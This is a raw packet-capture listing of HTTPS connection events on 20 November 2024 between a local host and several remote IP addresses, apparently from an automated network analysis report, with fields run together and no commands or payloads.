                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.512972116 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.513015032 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.513118982 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.513775110 CET49733443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.513786077 CET44349733104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.518500090 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.518563986 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.518572092 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.528196096 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.558806896 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.558984041 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.583203077 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.586033106 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.586086988 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.586102009 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.591080904 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.591136932 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.591142893 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.602557898 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.602618933 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.602627039 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.602674007 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.607084990 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.607103109 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.607150078 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.611056089 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.611243963 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.619393110 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.619402885 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.619728088 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.623394012 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.623402119 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.623716116 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.627125978 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.628015995 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.628058910 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.628077984 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.628339052 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.628500938 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.632257938 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.632361889 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.632410049 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.632718086 CET49729443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.632735014 CET44349729104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.636331081 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.636409998 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.637131929 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.642837048 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.642838001 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.642875910 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.642875910 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.642927885 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.642949104 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.642957926 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.643057108 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.643301010 CET49734443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.643310070 CET44349734104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.644452095 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.644596100 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.648629904 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.648737907 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.650829077 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.650837898 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.650904894 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.656701088 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.656769037 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.659590006 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.659600973 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.659653902 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.659670115 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.660639048 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.660702944 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.668239117 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.668334007 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.668358088 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.668625116 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.668700933 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.668881893 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.676683903 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.676714897 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.676759958 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.676804066 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.676888943 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.680983067 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.681039095 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.681065083 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.681148052 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.688764095 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.688827991 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.694099903 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.694164991 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.699589968 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.699670076 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.702673912 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.702729940 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.708563089 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.708627939 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.710884094 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.710947037 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.716603994 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.716667891 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.722409964 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.722485065 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.791121006 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.791187048 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.794826031 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.795026064 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.799930096 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.799984932 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.802985907 CET49735443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.802989960 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.803031921 CET4434973534.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.803086042 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.803093910 CET49735443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.803380966 CET49735443192.168.2.1234.120.195.249
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.803394079 CET4434973534.120.195.249192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.808651924 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.808716059 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.814490080 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.814546108 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.818105936 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.818274975 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.823648930 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.823760033 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.829303026 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.829502106 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.832173109 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.832242966 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.837754011 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.837907076 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.843255997 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.843528032 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.848923922 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.849001884 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.850599051 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.850687981 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.853738070 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.853832006 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.855674028 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.855748892 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.857441902 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.857506037 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.859951973 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.860021114 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.860259056 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.860363007 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.864538908 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.864605904 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.865597010 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.865747929 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.866873026 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.866929054 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.871362925 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.871431112 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.871572018 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.871642113 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.874000072 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.874062061 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.876879930 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.876929998 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.878504038 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.878573895 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.879817963 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.879874945 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.883069992 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.883132935 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.885451078 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.885503054 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.887814045 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.887902975 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.887942076 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.887980938 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.891266108 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.891330004 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.893779039 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.893884897 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.894778967 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.894839048 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.896838903 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.896898031 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.901297092 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.901355028 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.904969931 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.905118942 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.908489943 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.908545971 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.913014889 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.913074970 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.917680979 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.917757988 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.919975042 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.920043945 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.924572945 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.924633980 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.926902056 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.926953077 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.931615114 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.931679010 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.935997009 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.936053038 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.938350916 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.938405991 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.938426018 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.938446045 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.938493013 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.938653946 CET49727443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.938667059 CET44349727104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.942513943 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.942543030 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.943006992 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.943006992 CET49736443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.943033934 CET44349736104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.993906021 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.993968010 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.996494055 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:30.996784925 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.000745058 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.000840902 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.000853062 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.000916004 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.014266014 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.014276028 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.014306068 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.014336109 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.014353037 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.014421940 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.028075933 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.028099060 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.028196096 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.028213024 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.028253078 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.028290033 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.039882898 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.039902925 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.039983988 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.040010929 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.040064096 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.054615974 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.054639101 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.054696083 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.054714918 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.054747105 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.054883003 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.066306114 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.066323996 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.066382885 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.066390991 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.066507101 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.080172062 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.080192089 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.080243111 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.080267906 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.080382109 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.093727112 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.093748093 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.093786955 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.093802929 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.093851089 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.093851089 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.202317953 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.202344894 CET44349723104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.202467918 CET49723443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:31.202486992 CET44349723104.16.103.112192.168.2.12
